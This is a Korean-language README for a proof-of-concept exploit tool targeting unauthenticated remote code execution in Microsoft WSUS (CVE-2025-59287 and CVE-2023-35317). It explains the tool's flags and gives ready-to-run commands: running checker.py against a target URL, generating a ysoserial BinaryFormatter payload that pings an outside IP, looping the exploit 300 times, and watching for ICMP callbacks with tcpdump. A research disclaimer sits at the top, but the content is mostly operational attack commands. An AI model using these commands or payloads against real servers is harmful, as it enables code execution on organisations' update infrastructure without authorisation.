
Microsoft Windows Server Update Service(WSUS)의 인증되지 않은 RCE PoC - CVE-2025-59287 & CVE-2023-35317
CVE-2025-59287 내부: WSUS의 SoapFormatter RCE: https://shellcode.blog/wsus-cve-2025-59287-investigation/
이 소프트웨어는 순수하게 학술 연구와 효과적인 방어 기법 개발을 목적으로 제작되었으며, 명시적으로 승인된 경우를 제외하고 시스템을 공격하는 데 사용할 의도가 없습니다. 프로젝트 유지관리자는 이 소프트웨어의 오용에 대해 책임을 지지 않습니다. 책임감 있게 사용하세요.
필수 플래그:
--target-url – 대상 WSUS 서버 기본 URL (예: http://WIN-246JC0TE3BB.vuln.local:8530)--cve – CVE-2023-35317 또는 CVE-2025-59287 중 하나선택 플래그:
--dns-name – SOAP 요청에 사용되는 클라이언트 DNS 이름 (기본값: bugcrowd.local)--random – --dns-name 앞에 임의의 하위 도메인을 붙여 각 실행이 새 클라이언트로 보이게 합니다--payload – 사용자 정의 base64 인코딩 ysoserial 페이로드. 생략하면 선택한 --cve에 대해 내장 페이로드가 사용됩니다--debug – 상세 디버그 로깅 활성화 ([DEBUG] 줄)python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2025-59287 --randompython3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --dns-name bugcrowd.local --cve CVE-2023-35317 --random./ysoserial.exe -g RolePrincipal -f BinaryFormatter -c 'ping 18.118.100.100' -o base64 (또는 --cve CVE-2023-35317에 대해 내장 페이로드에 의존합니다)for i in `seq 1 300`; do sleep 1; python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2023-35317 --random ;donesudo tcpdump -l -n -i any icmp | while read line; do echo "$line"; echo -ne '\a'; done